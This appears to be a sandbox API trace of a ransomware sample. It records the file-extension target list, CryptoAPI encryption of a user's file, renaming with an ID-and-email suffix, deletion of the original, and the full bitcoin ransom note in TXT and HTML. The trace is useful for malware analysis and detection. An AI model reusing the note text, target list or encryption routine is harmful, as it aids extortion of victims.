	[0200.513] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\S5TikBRDPpN.swf", cchLength=0x72 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf") returned 0x72
	[0200.513] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.513] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0200.513] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf"
	[0200.514] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf") returned 114
	[0200.514] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.514] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0200.514] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.515] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0200.515] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.515] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.515] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0200.520] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0xaac6, lpNumberOfBytesRead=0x188c20, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x188c20*=0xaac6, lpOverlapped=0x0) returned 1
	[0200.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.523] CryptAcquireContextW (in: phProv=0x1887d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1887d0*=0xfcb5d8) returned 1
	[0200.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.526] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1887d4 | out: phHash=0x1887d4) returned 1
	[0200.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.526] CryptHashData (hHash=0xfb94b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0200.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.526] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb94b0, dwFlags=0x1, phKey=0x1887d8 | out: phKey=0x1887d8*=0xfb8ef0) returned 1
	[0200.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.527] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1887ec*=0xaac6, dwBufLen=0xaac6 | out: pbData=0x0*, pdwDataLen=0x1887ec*=0xaad0) returned 1
	[0200.528] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.528] RtlMoveMemory (in: Destination=0xfe9c60, Source=0xfdf190, Length=0xaac6 | out: Destination=0xfe9c60) 
	[0200.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.529] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9c60*, pdwDataLen=0x1887cc*=0xaac6, dwBufLen=0xaad0 | out: pbData=0xfe9c60*, pdwDataLen=0x1887cc*=0xaad0) returned 1
	[0200.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.529] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0200.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.530] CryptDestroyHash (hHash=0xfb94b0) returned 1
	[0200.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.530] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0200.530] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.530] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1887e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1887e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.531] GetUserNameA (in: lpBuffer=0x1886cc, pcbBuffer=0x1887e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1887e4) returned 1
	[0200.534] wsprintfW (in: param_1=0x188800, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 156
	[0200.534] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0200.535] WriteFile (in: hFile=0x3a0, lpBuffer=0xfe9c60*, nNumberOfBytesToWrite=0xaad0, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0xfe9c60*, lpNumberOfBytesWritten=0x188c28*=0xaad0, lpOverlapped=0x0) returned 1
	[0200.540] CloseHandle (hObject=0x3a0) returned 1
	[0200.540] CloseHandle (hObject=0x39c) returned 1
	[0200.541] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf")) returned 1
	[0200.547] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\s5tikbrdppn.swf")) returned 0
	[0200.547] FindNextFileW (in: hFindFile=0xfb8eb0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65865a50, ftCreationTime.dwHighDateTime=0x1d96a97, ftLastAccessTime.dwLowDateTime=0x463aedd0, ftLastAccessTime.dwHighDateTime=0x1d9715b, ftLastWriteTime.dwLowDateTime=0x463aedd0, ftLastWriteTime.dwHighDateTime=0x1d9715b, nFileSizeHigh=0x0, nFileSizeLow=0xaac6, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="S5TikBRDPpN.swf", cAlternateFileName="S5TIKB~1.SWF")) returned 0
	[0200.548] FindClose (in: hFindFile=0xfb8eb0 | out: hFindFile=0xfb8eb0) returned 1
	[0200.620] FindClose (in: hFindFile=0xfb8eb0 | out: hFindFile=0xfb8eb0) returned 0
	[0200.621] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv"
	[0200.621] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*"
	[0200.621] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.621] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.621] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.TXT") returned 126
	[0200.621] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.622] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0200.622] WriteFile (in: hFile=0x390, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0200.625] CloseHandle (hObject=0x390) returned 1
	[0200.625] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.626] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.628] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0200.629] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0200.629] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.629] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0200.630] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0200.630] WriteFile (in: hFile=0x390, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0200.630] CloseHandle (hObject=0x390) returned 1
	[0200.630] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0200.631] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0200.631] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0200.631] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.HTML") returned 127
	[0200.631] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.632] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0200.632] WriteFile (in: hFile=0x390, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0200.635] CloseHandle (hObject=0x390) returned 1
	[0200.635] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.635] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.636] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
